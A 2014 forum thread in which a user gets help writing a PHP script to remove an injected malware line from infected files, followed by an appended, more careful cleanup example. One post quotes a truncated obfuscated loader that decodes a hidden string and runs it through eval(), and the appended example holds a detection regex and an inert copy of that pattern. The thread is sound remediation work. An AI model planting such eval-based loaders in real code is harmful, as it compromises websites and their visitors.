alexwtz Posted April 3, 2014

I want to remove the first line of infected PHP files, but I want to keep <?php

I've attached 2 files, one with the infected file to see the first line, and one with a script that eliminates the first line, but I don't know how to keep the <?php... a.php is the script for cleaning

update_cron.php a.php

alexwtz Posted April 3, 2014

I think here it needs to insert <?php in a.php at line 91

```php
$the_content = preg_replace('/^\\s/', '', $the_content); // remove any leading whitespace.
```

How can I insert it?

Ch0cu3r Posted April 3, 2014

If it is the very first line of any file you want to replace with just a <?php then use

```php
$lines = file('path/to/file.php', FILE_IGNORE_NEW_LINES); // open the file and omit new lines from end of each line, each line will be fed into an array
$lines[0] = "<?php"; // Set the very first line to a <?php tag
file_put_contents('path/to/file.php', implode(PHP_EOL, $lines)); // implode the array, add in the newlines and write the contents back to the file
```

Edited April 3, 2014 by Ch0cu3r

alexwtz Posted April 3, 2014

This is my function, and I put the code for the new line but it doesn't work

```php
function fix_files( $files ) {
    global $hack_str;
    foreach ( $files as $file ) {
        if ( is_array($file) ) {
            fix_files($file);
        } else {
            $contents = explode("\n", file_get_contents($file));
            unset($contents[0]);
            $f = fopen($file, 'w');
            if ( $f ) {
                $the_content = implode("\n", $contents);
                $the_content = preg_replace('/^\\s/', '<?php', $the_content); // remove any leading whitespace.
                $lines[0] = "<?php"; // Set the first line to a <?php tag
                fwrite($f, $the_content, strlen($the_content));
                fclose($f);
                echo "Removed first line containing <code>" . htmlentities($hack_str) ."</code>from $file...<br />";
            }
        }
    }
}
```

Ch0cu3r Posted April 3, 2014

You need to replace the code in the else statement with my three lines of code, something like

```php
function fix_files( $files ) {
    global $hack_str;
    foreach ( $files as $file ) {
        if ( is_array($file) ) {
            fix_files($file);
        } else {
            $lines = file($file, FILE_IGNORE_NEW_LINES);
            $lines[0] = "<?php"; // Set the first line to a <?php tag
            file_put_contents($file, implode(PHP_EOL, $lines));
            echo "Removed first line containing <code>" . htmlentities($hack_str) ."</code>from $file...<br />";
        }
    }
}
}
```

Edited April 3, 2014 by Ch0cu3r

alexwtz Posted April 3, 2014

It's ok but overrides my first line. This is the way I test it:

```php
function fix_files( $files ) {
    global $hack_str;
    foreach ( $files as $file ) {
        if ( is_array($file) ) {
            fix_files($file);
        } else {
            $contents = explode("\n", file_get_contents($file));
            unset($contents[0]);
            $f = fopen($file, 'w');
            if ( $f ) {
                $the_content = implode("\n", $contents);
                $the_content = preg_replace('/^\\s/', '<?php', $the_content); // remove any leading whitespace.
                fwrite($f, $the_content, strlen($the_content));
                fclose($f);
                $lines = file($file, FILE_IGNORE_NEW_LINES);
                $lines[0] = "<?php"; // Set the first line to a <?php tag
                file_put_contents($file, implode(PHP_EOL, $lines));
                echo "Removed first line containing <code>" . htmlentities($hack_str) ."</code>from $file...<br />";
            }
        }
    }
}
```

because I need to search many files to delete the code and put <?php, because I want just in the infected files to make this change

Edited April 3, 2014 by alexwtz

Ch0cu3r Posted April 3, 2014

> it's ok but overrides my first line

I don't understand? You have files which have code like this as the very first line (shortened for readability)

```php
<?php /*versio:3.02*/ $GLOBALS["ktrmpz"]="PaUlQzT...iIpKSk7at"; if (!function_exists('tjjluyoc')){function tjjluyoc($a, $b){$c=$GLOBALS['ktrmpz'];$d=pack('H*','626173653634'.'5f6465636f6465'); return $d(substr($c, $a, $b));};eval(tjjluyoc(561,3272));};?><?php
```

and you want to remove it. My code replaces that code in the first line with a <?php. It is not meant to be used with your existing code! That is why I said to replace your code in the else statement with my code!

Edited April 3, 2014 by Ch0cu3r

alexwtz Posted April 3, 2014

Yes, I have many infected PHP files and I want to clean the infected code. The script a.php makes the search and deletes the line, but I need to insert a new line with <?php or replace the code line.

In a.php at line 79 is the fix code; there I need a function that, after the code deletes the malware, inserts or replaces with <?php

The steps are to search and then to change, because not all files are infected.

Edited April 3, 2014 by alexwtz

Ch0cu3r Posted April 3, 2014 (Solution)

I have downloaded your a.php and replaced your fix_files function with the code in my post here (although there was an error due to too many } in my code). Then I created a few test files, some with the infected code and some without. I then ran a.php and it removed the malicious code from the infected files.

So what is the issue now?

I have attached the modified a.php here.

a.php

alexwtz Posted April 3, 2014

Yes, it works! Thank you very much
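
A more conservative variant of the fix discussed in this thread, as an added example that is not the thread's a.php or either poster's code: it rewrites line 1 only when that line matches the injected block quoted above, leaves every other file unwritten, and keeps a copy of the infected original. The regex signature, the function names and the backup layout are assumptions made for this example.

```php
<?php
/* Added example, not the thread's a.php. Assumed signature, taken from the
   sample above: an injected PHP block on line 1 that sets $GLOBALS[...],
   calls eval(), and closes right before the file's own opening tag. */
const INJECTED_BLOCK = '/^<\?php\s.*?\$GLOBALS\[.*?\beval\s*\(.*?\?>(?=<\?php)/s';

/* Returns 'fixed', 'unchanged' (no match, file not written) or 'error'. */
function clean_first_line(string $file, string $backupDir): string
{
    $content = file_get_contents($file);
    if ($content === false) {
        return 'error';
    }
    // Split off line 1 so nothing below it is ever rewritten.
    $eol   = strpos($content, "\n");
    $first = $eol === false ? $content : substr($content, 0, $eol);
    $rest  = $eol === false ? '' : substr($content, $eol);

    $fixed = preg_replace(INJECTED_BLOCK, '', $first, 1, $count);
    if ($fixed === null) {
        return 'error';
    }
    if ($count === 0) {
        return 'unchanged';
    }
    // Keep the infected original outside the web root, under a non-.php name.
    if (!copy($file, $backupDir . '/' . sha1($file) . '.txt')) {
        return 'error';
    }
    return file_put_contents($file, $fixed . $rest, LOCK_EX) === false ? 'error' : 'fixed';
}

/* Accepts the same nested array of paths as the thread's fix_files(). */
function clean_files(array $files, string $backupDir): array
{
    $report = [];
    array_walk_recursive($files, function ($file) use (&$report, $backupDir) {
        $report[$file] = clean_first_line($file, $backupDir);
    });
    return $report;
}

// Constructed, inert sample files (written to a temp dir, never included).
$dir = sys_get_temp_dir() . '/clean_demo_' . getmypid();
mkdir($dir . '/backup', 0700, true);
$bad = '<?php /*x*/ $GLOBALS["k"]="QUJD"; if (!function_exists("f")){function f($a,$b){return "";};eval(f(0,0));};?>';
file_put_contents("$dir/infected.php", $bad . "<?php\necho 'site';\n");
file_put_contents("$dir/clean.php", "<?php\necho 'site';\n");
print_r(clean_files(["$dir/infected.php", ["$dir/clean.php"]], "$dir/backup"));
```

A file reported as `unchanged` was not matched by this one signature, which is not the same as being clean; the route used to write to the files still has to be found and closed.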